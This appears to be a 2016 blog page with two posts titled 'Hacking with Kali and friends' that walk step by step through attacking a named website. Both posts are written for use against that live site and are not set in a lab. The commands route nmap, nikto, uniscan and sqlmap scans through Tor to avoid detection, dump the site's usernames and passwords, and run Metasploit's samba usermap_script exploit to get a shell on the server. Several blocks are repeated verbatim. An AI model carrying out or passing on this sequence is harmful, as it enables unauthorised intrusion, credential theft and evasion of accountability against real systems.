Saturday, February 20, 2016
Friday, February 5, 2016
Hacking with Kali and friends - Exploitorama
Scan the ip with nmap + proxychains to route it over tor;
anon@1337-817chs:~$sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
Scan the site with nikto and uniscan + proxychains to route it over tor;
anon@1337-817chs:~$sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
anon@1337-817chs:~$sudo proxychains ./uniscan -u https://www.Jihadist.ps/
anon@1337-817chs:~$sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105
Scan the site with nikto and uniscan + proxychains to route it over tor;
anon@1337-817chs:~$sudo proxychains nikto -h www.Jihadist.ps && proxychains nikto -h 104.28.##.105
anon@1337-817chs:~$sudo proxychains ./uniscan -u https://www.Jihadist.ps/
that will take awhile...check on your sqlmap results from chapter 1
any usernames or passwords? ooh goody...
on too metasploit!!
The following info should have been obtained with the help of the tor cloaked scanning
Target ip (from nslookup) 104.28.##.105
Target OS and Version (from nmap set to zero ping "-Pn" to avoid detection The
-Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS)
kick it oldschool by googling "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit.
We need to find out the OS and ports and services running on the target system.
Once you find the open ports and service like a samba port its party time.
Fire up Metasploit
anon@1337-817chs:~$msfconsole
Route it through TOR
msf >set Proxies socks5:127.0.0.1:9050
We need to find the version of samba..
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >set RHOST 104.28.##.105
RHOST => 104.28.##.105
msfauxiliary(smb_version) >set RPORT 445
RPORT => 445
msfauxiliary(smb_version) >exploit
With version in hand, restart msfconsole now we use the appropriate module...
anon@1337-817chs:~$msfconsole
msf >set Proxies socks5:127.0.0.1:9050
msf >use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 104.28.##.105
msf exploit(usermap_script) >exploit
We now have a command shell on the target box... have fun!
Hacking Servers with Kali and friends - Chapter 1; Sql injection with sqlmap
look up target ip address (write the following info down);
anon@1337-817chs:~$ nslookup www.Jihadist.ps
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
www.Jihadist.ps canonical name = Jihadist.ps.
Name: Jihadist.ps
Address: 104.28.##.105
Name: Jihadist.ps
Address: 104.28.##.105
make sure tor is installed and running.
run sqlmap over tor with random user agent at target page for usernames and passwords;
anon@1337-817chs:~$sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps
that will take awhile on to Metasploit in chapter 2
anon@1337-817chs:~$ nslookup www.Jihadist.ps
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
www.Jihadist.ps canonical name = Jihadist.ps.
Name: Jihadist.ps
Address: 104.28.##.105
Name: Jihadist.ps
Address: 104.28.##.105
make sure tor is installed and running.
run sqlmap over tor with random user agent at target page for usernames and passwords;
anon@1337-817chs:~$sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps
that will take awhile on to Metasploit in chapter 2
Subscribe to:
Posts (Atom)